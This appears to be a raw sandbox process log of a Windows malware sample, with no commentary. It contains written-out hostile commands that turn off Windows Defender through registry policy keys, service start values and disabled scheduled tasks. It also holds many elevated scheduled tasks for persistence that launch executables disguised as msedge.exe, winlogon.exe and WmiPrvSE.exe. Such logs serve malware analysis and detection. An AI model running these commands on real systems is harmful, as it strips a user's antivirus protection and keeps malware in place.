schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Recovery\WindowsRE\SppExtComObj.exe

"C:\Recovery\WindowsRE\SppExtComObj.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\HcCr6nEVp7.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Admin\AppData\Local\Temp\FunCheker.exe

"C:\Users\Admin\AppData\Local\Temp\FunCheker.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\ZqKnM.bat" "

C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe

"C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe"

C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe

"C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\clear_av.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FunChecker .bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "

C:\Recovery\WindowsRE\SppExtComObj.exe

"C:\Recovery\WindowsRE\SppExtComObj.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 6 /tr "'C:\Windows\ja-JP\msedge.exe'" /f

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\kXeJA.vbe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Windows\ja-JP\msedge.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 5 /tr "'C:\Windows\ja-JP\msedge.exe'" /rl HIGHEST /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\services.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\services.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\services.exe'" /rl HIGHEST /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 11 /tr "'C:\Program Files\Java\jre-1.8\winlogon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\Java\jre-1.8\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Program Files\Java\jre-1.8\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\Idle.exe'" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\Idle.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\Idle.exe'" /rl HIGHEST /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 10 /tr "'C:\Windows\it-IT\msedge.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Windows\it-IT\msedge.exe'" /rl HIGHEST /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 11 /tr "'C:\Windows\it-IT\msedge.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\Documents\sihost.exe'" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\All Users\Documents\sihost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\Documents\sihost.exe'" /rl HIGHEST /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\6GXVlfePFq.bat"

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\ja-JP\msedge.exe

"C:\Windows\ja-JP\msedge.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\ZqKnM.bat" "

C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe

"C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4148 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\FunCheker.exe

"C:\Users\Admin\AppData\Local\Temp\FunCheker.exe"

C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe

"C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\clear_av.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FunChecker .bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\kXeJA.vbe"

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\ZqKnM.bat" "

C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe

"C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\MSBuild\winlogon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files (x86)\MSBuild\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\MSBuild\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 13 /tr "'C:\Windows\Performance\WinSAT\DataStore\SearchApp.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Windows\Performance\WinSAT\DataStore\SearchApp.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 14 /tr "'C:\Windows\Performance\WinSAT\DataStore\SearchApp.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\Default User\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\Idle.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\Idle.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\Idle.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\Templates\System.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Users\All Users\Templates\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\Templates\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\WindowsHolographicDevices\cmd.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\All Users\WindowsHolographicDevices\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\WindowsHolographicDevices\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Windows\InputMethod\SHARED\conhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\InputMethod\SHARED\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Windows\InputMethod\SHARED\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\conhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\msedge.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\msedge.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\msedge.exe'" /rl HIGHEST /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wzSW7E5aas.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe

"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\pakqiPPahT.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe

"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\oqEnL4f5pl.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe

"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\kbrh69MYEy.bat"

C:\Windows\system32\reg.exe

reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\system32\reg.exe

reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\clear_av.bat" "

C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe

"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"

C:\Windows\System32\cmd.exe

